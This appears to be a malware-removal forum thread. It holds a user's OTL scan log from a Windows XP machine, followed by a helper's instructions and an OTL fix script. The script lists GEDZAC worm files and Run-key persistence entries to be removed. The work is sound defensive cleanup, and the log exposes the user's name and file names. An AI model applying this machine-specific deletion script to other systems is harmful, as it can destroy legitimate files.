[2008/04/14 08:00:00 | 000,075,264 | ---- | M] (Microsoft Corporation) MD5=23C74D75E36E7158768DD63D92789A91 -- C:\WINDOWS\system32\drivers\ipsec.sys

< MD5 for: LSASS.EXE >
[2008/04/14 08:00:00 | 000,013,312 | ---- | M] (Microsoft Corporation) MD5=BF2466B3E18E970D8A976FB95FC1CA85 -- C:\WINDOWS\ERDNT\cache\lsass.exe
[2008/04/14 08:00:00 | 000,013,312 | ---- | M] (Microsoft Corporation) MD5=BF2466B3E18E970D8A976FB95FC1CA85 -- C:\WINDOWS\system32\dllcache\lsass.exe
[2008/04/14 08:00:00 | 000,013,312 | ---- | M] (Microsoft Corporation) MD5=BF2466B3E18E970D8A976FB95FC1CA85 -- C:\WINDOWS\system32\lsass.exe

< MD5 for: NETBT.SYS >
[2008/04/14 08:00:00 | 000,162,816 | ---- | M] (Microsoft Corporation) MD5=74B2B2F5BEA5E9A3DC021D685551BD3D -- C:\WINDOWS\system32\dllcache\netbt.sys
[2008/04/14 08:00:00 | 000,162,816 | ---- | M] (Microsoft Corporation) MD5=74B2B2F5BEA5E9A3DC021D685551BD3D -- C:\WINDOWS\system32\drivers\netbt.sys

< MD5 for: SERVICES.EXE >
[2009/02/06 07:06:24 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=020CEAAEDC8EB655B6506B8C70D53BB6 -- C:\WINDOWS\$hf_mig$\KB956572\SP3QFE\services.exe
[2008/04/14 08:00:00 | 000,108,544 | ---- | M] (Microsoft Corporation) MD5=0E776ED5F7CC9F94299E70461B7B8185 -- C:\WINDOWS\$NtUninstallKB956572$\services.exe
[2009/02/06 07:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\ERDNT\cache\services.exe
[2009/02/06 07:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\dllcache\services.exe
[2009/02/06 07:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\services.exe

< MD5 for: SMSS.EXE >
[2008/04/14 08:00:00 | 000,470,016 | ---- | M] (Microsoft Corporation) MD5=3C3393C92A73A3006C7B706DAC54A812 -- C:\i386\SYSTEM32\SMSS.EXE
[2008/04/14 08:00:00 | 000,050,688 | ---- | M] (Microsoft Corporation) MD5=5F816C1F539266D2D4C78694239DA0B5 -- C:\WINDOWS\system32\dllcache\smss.exe
[2008/04/14 08:00:00 | 000,050,688 | ---- | M] (Microsoft Corporation) MD5=5F816C1F539266D2D4C78694239DA0B5 -- C:\WINDOWS\system32\smss.exe
[2004/08/04 00:56:58 | 000,152,576 | ---- | M] (Microsoft Corporation) MD5=DA5CF1C368B33D75602FD6B3A7F5E0C6 -- C:\cmdcons\SYSTEM32\SMSS.EXE

< MD5 for: SVCHOST.EXE >
[2008/04/14 08:00:00 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\ERDNT\cache\svchost.exe
[2008/04/14 08:00:00 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\system32\dllcache\svchost.exe
[2008/04/14 08:00:00 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\system32\svchost.exe
[2011/12/24 18:50:20 | 000,182,856 | ---- | M] () MD5=B382935AB01B27D0E14F267DBF288896 -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\svchost.exe

< MD5 for: WINLOGON.EXE >
[2011/12/24 18:50:20 | 000,182,856 | ---- | M] () MD5=B382935AB01B27D0E14F267DBF288896 -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2008/04/14 08:00:00 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\ERDNT\cache\winlogon.exe
[2008/04/14 08:00:00 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\system32\dllcache\winlogon.exe
[2008/04/14 08:00:00 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\system32\winlogon.exe

========== Hard Links - Junction Points - Mount Points - Symbolic Links ==========
[C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a] -> C:\WINDOWS\WinSxS\x86_System.EnterpriseServices_b03f5f7f11d50a3a_2.0.0.0_x-ww_7d5f3790 -> Junction
[C:\WINDOWS\assembly\GAC_MSIL\IEExecRemote\2.0.0.0__b03f5f7f11d50a3a] -> C:\WINDOWS\WinSxS\MSIL_IEExecRemote_b03f5f7f11d50a3a_2.0.0.0_x-ww_6e57c34e -> Junction

========== Alternate Data Streams ==========

@Alternate Data Stream - 816 bytes -> C:\WINDOWS\3628639882:1968813863.exe
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 4521 Bessen 2009.doc:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1188 Co 2003.doc:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa.xls:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa (Thom Ringer's conflicted copy 2012-02-08).xls:com.dropbox.attributes
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Data Abstraction Thom.xls:com.dropbox.attributes
@Alternate Data Stream - 65 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Tracking SS.xlsx:com.dropbox.attributes
@Alternate Data Stream - 58 bytes -> C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf:com.dropbox.attributes
@Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1171 Banait 2002.doc:com.dropbox.attributes
@Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot:com.dropbox.attributes

< End of report >

Extras:
OTL Extras logfile created on: 13/05/2012 12:06:57 PM - Run 1
OTL by OldTimer - Version 3.2.42.3 Folder = C:\Documents and Settings\Annie\My Documents\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 6.0.2900.5512)
Locale: 00001009 | Country: Canada | Language: ENC | Date Format: dd/MM/yyyy

1013.99 Mb Total Physical Memory | 587.01 Mb Available Physical Memory | 57.89% Memory free
2.38 Gb Paging File | 2.07 Gb Available in Paging File | 86.93% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 139.04 Gb Total Space | 15.29 Gb Free Space | 11.00% Space Free | Partition Type: NTFS

Computer Name: FELIX | User Name: Annie | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 90 Days

========== Extra Registry (SafeList) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.url [@ = InternetShortcut] -- rundll32.exe shdocvw.dll,OpenURL %l

[HKEY_USERS\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
InternetShortcut [open] -- rundll32.exe shdocvw.dll,OpenURL %l
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" %*
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled" = 1
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 0
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 1

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:*:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:*:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:*:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:*:Enabled:@xpsp2res.dll,-22002
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008
"139:TCP" = 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe" = C:\Program Files\Samsung\AllShare\AllShareDMS\AllShareDMS.exe:*:Enabled:Samsung AllShare Service -- (Samsung Electronics Co., Ltd.)
"C:\Program Files\Samsung\AllShare\AllShare.exe" = C:\Program Files\Samsung\AllShare\AllShare.exe:*:Enabled:Samsung AllShare Player -- (Samsung Electronics Co., Ltd.)
"C:\Program Files\Samsung\AllShare\AllShareAgent.exe" = C:\Program Files\Samsung\AllShare\AllShareAgent.exe:*:Enabled:Samsung AllShare Agent -- (Samsung Electronics Co., Ltd.)


========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP280_series" = Canon MP280 series MP Drivers
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216022FF}" = Java™ 6 Update 22
"{3108C217-BE83-42E4-AE9E-A56A2A92E549}" = Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver
"{3175E049-F9A9-4A3D-8F19-AC9FB04514D1}" = Windows Live Communications Platform
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{399C37FB-08AF-493B-BFED-20FBD85EDF7F}" = WebCam
"{3E171899-0175-47CC-84C4-562ACDD4C021}" = OpenOffice.org 3.3
"{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
"{474F25F5-BDC9-40E5-B1B6-F6BF23FC106F}" = Windows Live Essentials
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{529125EF-E3AC-4B74-97E6-F688A7C0F1BF}" = Paint.NET v3.5.10
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6D9021DC-CF1B-4148-8C80-6D8E8A8A33EB}" = Video Web Camera
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{7CAC6A44-C3DE-4153-ACA6-7524602C789E}" = Facebook Video Calling 1.2.0.159
"{7F811A54-5A09-4579-90E1-C93498E230D9}" = Gateway Recovery Management
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{90120000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
"{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
"{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
"{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}" = Intel® Matrix Storage Manager
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{96AE7E41-E34E-47D0-AC07-1091A8127911}" = USB2.0 Card Reader Software
"{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{AA59DDE4-B672-4621-A016-4C248204957A}" = Skype™ 5.5
"{B57EAFF2-D6EE-4C6C-9175-ED9F17BFC1BC}" = Windows Live Messenger
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C19BE821-89B1-4A96-AC7C-873810C0CB5F}" = ContentSAFER for Wizmax
"{C20CE592-B0F8-4D20-BF31-0151CA6331A6}" = EmoDio
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{DF47ACA3-7C78-4C08-8007-AC682563C9F1}" = Samsung AllShare
"{E6158D07-2637-4ECF-B576-37C489669174}" = Windows Live Call
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 11.6
"Age of Empires" = Microsoft Age of Empires
"Audacity_is1" = Audacity 1.2.6
"Broadband" = Broadband
"DAEMON Tools Lite" = DAEMON Tools Lite
"DivX Setup.divx.com" = DivX Setup
"ENTERPRISE" = Microsoft Office Enterprise 2007
"Foxit Phantom" = Foxit Phantom
"HDMI" = Intel® Graphics Media Accelerator Driver
"InstallShield_{C20CE592-B0F8-4D20-BF31-0151CA6331A6}" = EmoDio
"InstallShield_{DF47ACA3-7C78-4C08-8007-AC682563C9F1}" = Samsung AllShare
"LManager" = Launch Manager
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.60.0.1800
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox 8.0 (x86 en-US)" = Mozilla Firefox 8.0 (x86 en-US)
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"uTorrent" = µTorrent
"ViStart" = ViStart
"Wdf01007" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.7
"Windows Media Format Runtime" = Windows Media Format Runtime
"Windows Media Player" = Windows Media Player 10
"WinLiveSuite_Wave3" = Windows Live Essentials
"Zero Assumption Recovery_is1" = Zero Assumption Recovery Version 9

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Dropbox" = Dropbox
"Google Chrome" = Google Chrome

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 12/05/2012 2:12:22 PM | Computer Name = GATEWAY | Source = Application Error | ID = 1000
Description = Faulting application vistart.exe, version 1.6.0.3804, faulting module
unknown, version 0.0.0.0, fault address 0x0c408bdc.

Error - 12/05/2012 5:56:13 PM | Computer Name = GATEWAY | Source = Google Update | ID = 20
Description =

Error - 12/05/2012 7:22:23 PM | Computer Name = GATEWAY | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 7:29:13 PM | Computer Name = GATEWAY | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 7:31:31 PM | Computer Name = GATEWAY | Source = Application Error | ID = 1000
Description = Faulting application vistart.exe, version 1.6.0.3804, faulting module
unknown, version 0.0.0.0, fault address 0x0c408bdc.

Error - 12/05/2012 7:43:18 PM | Computer Name = GATEWAY | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 7:45:24 PM | Computer Name = GATEWAY | Source = Application Error | ID = 1000
Description = Faulting application vistart.exe, version 1.6.0.3804, faulting module
unknown, version 0.0.0.0, fault address 0x0c408bdc.

Error - 12/05/2012 8:15:26 PM | Computer Name = FELIX | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 8:28:10 PM | Computer Name = FELIX | Source = CardSpace 3.0.0.0 | ID = 327949
Description = The Windows CardSpace service is too busy to process this request.
User has too many outstanding requests. Additional Information: at System.Environment.GetStackTrace(Exception
e, Boolean needFileInfo) at System.Environment.get_StackTrace() at Microsoft.InfoCards.Diagnostics.InfoCardTrace.BuildMessage(InfoCardBaseException
ie) at Microsoft.InfoCards.Diagnostics.InfoCardTrace.TraceAndLogException(Exception
e) at Microsoft.InfoCards.Diagnostics.InfoCardTrace.ThrowHelperError(Exception
e) at Microsoft.InfoCards.UIAgentMonitor.AddNewClient(UIAgentMonitorHandle handle)

at Microsoft.InfoCards.UIAgentMonitorHandle.CreateAgent(Int32 callerPid, WindowsIdentity
callerIdentity, Int32 tsSessionId) at Microsoft.InfoCards.RequestFactory.CreateClientRequestInstance(UIAgentMonitorHandle
monitorHandle, String reqName, IntPtr rpcHandle, Stream inStream, Stream outStream)

at Microsoft.InfoCards.RequestFactory.ProcessNewRequest(Int32 parentRequestHandle,
IntPtr rpcHandle, IntPtr inArgs, IntPtr& outArgs)

Error - 13/05/2012 11:01:21 AM | Computer Name = FELIX | Source = JavaQuickStarterService | ID = 1
Description =

[ OSession Events ]
Error - 30/11/2011 9:05:04 PM | Computer Name = GATEWAY | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 1, Application Name: Microsoft Office Excel, Application Version:
12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 2260
seconds with 0 seconds of active time. This session ended with a crash.

[ System Events ]
Error - 12/05/2012 1:56:18 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 2:09:47 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 7:12:37 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7034
Description = The Microsoft Forefront UAG Quarantine Enforcement Client service
terminated unexpectedly. It has done this 1 time(s).

Error - 12/05/2012 7:22:27 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 7:29:14 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 7:29:44 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7034
Description = The Microsoft Forefront UAG Quarantine Enforcement Client service
terminated unexpectedly. It has done this 1 time(s).

Error - 12/05/2012 7:30:16 PM | Computer Name = GATEWAY | Source = NapAgent | ID = 12
Description = The enforcement client 79622 failed the call to NapEnforcementClientCallback::NotifySoHChange.

Error - 12/05/2012 7:43:19 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 8:15:28 PM | Computer Name = FELIX | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 13/05/2012 11:01:27 AM | Computer Name = FELIX | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).


< End of report >


Edited by worries, 13 May 2012 - 01:23 PM.


#13 B-boy/StyLe/

    Bleepin' Freestyler

  • Malware Response Team
  • 8,307 posts
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 13 May 2012 - 10:36 PM

Hello,



STEP 1



Please download DummyCreator.zip and unzip it.
  • Run the tool.
  • Copy and paste the following into the edit box:

    C:\WINDOWS\3628639882
  • Press the Create button and post the content of the Result.txt.

    Important: Restart the computer.



STEP 2



We need to run an OTL Fix



  • Please reopen OTL on your desktop.
  • Copy and Paste the following code into the OTL Custom Scans/Fixes textbox. Do not include the word "Code"
    :OTL
    PRC - [2012/05/12 20:31:28 | 000,030,721 | ---- | M] (GEDZAC) -- C:\WINDOWS\system32\sendi.exe
    PRC - [2012/05/12 20:14:05 | 000,017,409 | ---- | M] (GEDZAC LABS) -- C:\WINDOWS\system32\regsrv.exe
    DRV - File not found [Kernel | On_Demand | Stopped] -- C:\ComboFix\catchme.sys -- (catchme)
    DRV - File not found [Kernel | On_Demand | Unknown] -- C:\DOCUME~1\Annie\LOCALS~1\Temp\aswMBR.sys -- (aswMBR)
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
    O4 - HKLM..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs ()
    O4 - HKLM..\Run: [Kernel32] C:\WINDOWS\system32\Kernel32.win ()
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableRegistryTools = 1
    [2012/05/12 20:31:27 | 000,030,721 | ---- | C] (GEDZAC) -- C:\WINDOWS\System32\sendi.exe
    [2012/05/12 20:14:04 | 000,017,409 | ---- | C] (GEDZAC LABS) -- C:\WINDOWS\System32\regsrv.exe
    [2012/03/01 01:21:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon
    [2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\Babylon
    [2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Babylon
    [2012/05/13 11:18:17 | 000,000,354 | ---- | M] () -- C:\Estigma.hta
    [2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Israfel.vbs
    [2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\hta.vbs
    [2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\GEDZAC.vbs
    [2012/05/13 11:17:53 | 000,123,897 | ---- | M] () -- C:\WINDOWS\System32\FILEZIP.ZIP
    [2012/05/13 11:17:51 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\File.vbs
    [2012/05/13 11:17:14 | 000,272,349 | ---- | M] () -- C:\WINDOWS\DelShortcut.vbs
    [2012/05/13 11:16:15 | 000,002,913 | ---- | M] () -- C:\WINDOWS\wininit.ini
    [2012/05/13 11:02:05 | 000,002,333 | ---- | M] () -- C:\WINDOWS\System32\ixn.dat
    [2012/05/13 11:02:05 | 000,001,201 | ---- | M] () -- C:\WINDOWS\System32\ix.dat
    [2012/05/13 11:01:30 | 000,272,588 | ---- | M] () -- C:\WINDOWS\System32\Template.htm
    [2012/05/13 11:01:30 | 000,002,268 | ---- | M] () -- C:\WINDOWS\System32\iwn.dat
    [2012/05/13 11:01:30 | 000,001,372 | ---- | M] () -- C:\WINDOWS\System32\iw.dat
    [2012/05/11 11:22:21 | 000,012,549 | ---- | M] () -- C:\WINDOWS\System32\AvrilLavigne.jpg
    [2012/03/01 10:42:56 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Kernel32.win
    [2012/03/01 01:22:07 | 000,000,237 | ---- | M] () -- C:\user.js
